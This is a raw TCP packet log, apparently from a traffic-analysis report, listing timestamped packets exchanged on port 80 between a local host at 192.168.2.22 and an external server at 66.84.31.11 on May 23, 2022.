                                                                                      May 23, 2022 09:00:01.027662039 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027698040 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027704954 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027709961 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027731895 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027766943 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027781010 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027786970 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027798891 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027798891 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027833939 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027868986 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027879953 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027885914 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027904034 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027939081 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.027951002 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027956009 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.027971983 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.028019905 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.028027058 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.028943062 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.030885935 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139342070 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139441013 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139484882 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139549971 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139575005 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139590025 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139667034 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139672995 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139681101 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139686108 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139691114 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139708996 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139750004 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.139765978 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139775038 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.139822006 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.140754938 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.140808105 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.140880108 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.140908003 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.140922070 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.140952110 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.140966892 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.141024113 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.141038895 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.141046047 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.141050100 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.141211987 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.142873049 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.142930031 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143043041 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143155098 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143213034 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143222094 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143280029 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143311977 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143349886 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143405914 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143445969 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143501043 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143621922 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143646002 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143692017 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143728971 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143737078 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143739939 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143774986 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143834114 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143851042 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.143961906 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.143999100 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144085884 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144141912 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144160986 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144176006 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144180059 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144186974 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144232988 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144243002 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144275904 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144292116 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144318104 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144328117 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144361973 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144368887 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144403934 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144423962 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144444942 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144496918 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144505024 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144525051 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144603968 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144609928 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144618988 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144671917 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144682884 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144726992 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144764900 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144769907 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144778967 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144798994 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.144845009 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.144850969 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.145358086 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.145977974 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146058083 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146095037 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146106005 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146116972 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146167040 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146209002 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146212101 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146218061 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146265030 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146270037 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146305084 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146313906 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146347046 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146349907 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146385908 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.146395922 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146439075 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.146889925 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255306005 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255331039 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255350113 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255373001 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255422115 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255440950 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255453110 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255475998 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255480051 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255542994 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255572081 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255587101 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255598068 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255625963 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255631924 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255650043 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255670071 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255682945 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255686998 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255714893 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.255820990 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255839109 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.255867958 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256050110 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256057978 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256076097 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256124973 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256134987 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256217957 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256237984 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256254911 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256300926 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256311893 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256325960 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256328106 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256351948 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256370068 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256400108 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256413937 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256465912 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256531000 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256541014 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256560087 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256577969 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256602049 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256608009 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256612062 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256622076 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256628990 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256645918 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256658077 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256669998 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256675959 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256694078 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256699085 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256710052 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256711960 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256728888 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256742954 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256755114 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256772041 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256783009 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256788969 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256789923 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256807089 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256818056 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256824970 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256830931 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256848097 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256859064 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256863117 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256865978 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256884098 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.256894112 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256896973 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256952047 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.256997108 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257014990 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257061958 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257069111 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257136106 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257354975 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257405996 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257431030 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257436037 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257442951 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257448912 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257489920 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257500887 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257622004 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257639885 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257692099 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257702112 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257920980 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257939100 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.257981062 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.257992029 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258145094 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258161068 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258219957 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258230925 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258343935 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258362055 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258413076 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258421898 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258559942 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258577108 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258622885 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258631945 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258743048 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258760929 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258805990 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258815050 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.258949995 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.258966923 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259186029 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259202957 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259232998 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259243965 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259273052 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259290934 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259315014 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259319067 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259383917 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259402037 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259426117 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259434938 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259485960 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259502888 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259526014 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259535074 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259576082 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259593964 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259619951 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259630919 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259670019 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259689093 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259716034 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259725094 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259756088 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259773970 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259804964 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259814024 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259848118 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259896994 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259913921 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259960890 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259962082 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.259964943 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.259979963 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260025978 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260034084 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260126114 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260160923 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260190964 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260200024 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260261059 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260278940 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260329962 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260381937 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260399103 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260426044 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260447979 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260449886 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260591030 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260610104 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260657072 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260672092 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260700941 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260718107 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260767937 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260770082 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260782957 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260785103 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260826111 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260834932 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.260976076 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.260998011 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261007071 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261020899 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261075974 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261085987 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261106968 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261123896 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261169910 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261179924 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261218071 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261234999 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261271954 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261274099 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261288881 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261307955 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261320114 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261385918 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261403084 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261429071 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261437893 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261506081 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261523008 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261554956 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261565924 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261569977 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261594057 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261612892 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261641979 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261667967 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261684895 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261713028 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261718035 CEST4917480192.168.2.2266.84.31.11
                                                                                      May 23, 2022 09:00:01.261768103 CEST804917466.84.31.11192.168.2.22
                                                                                      May 23, 2022 09:00:01.261785030 CEST804917466.84.31.11192.168.2.22
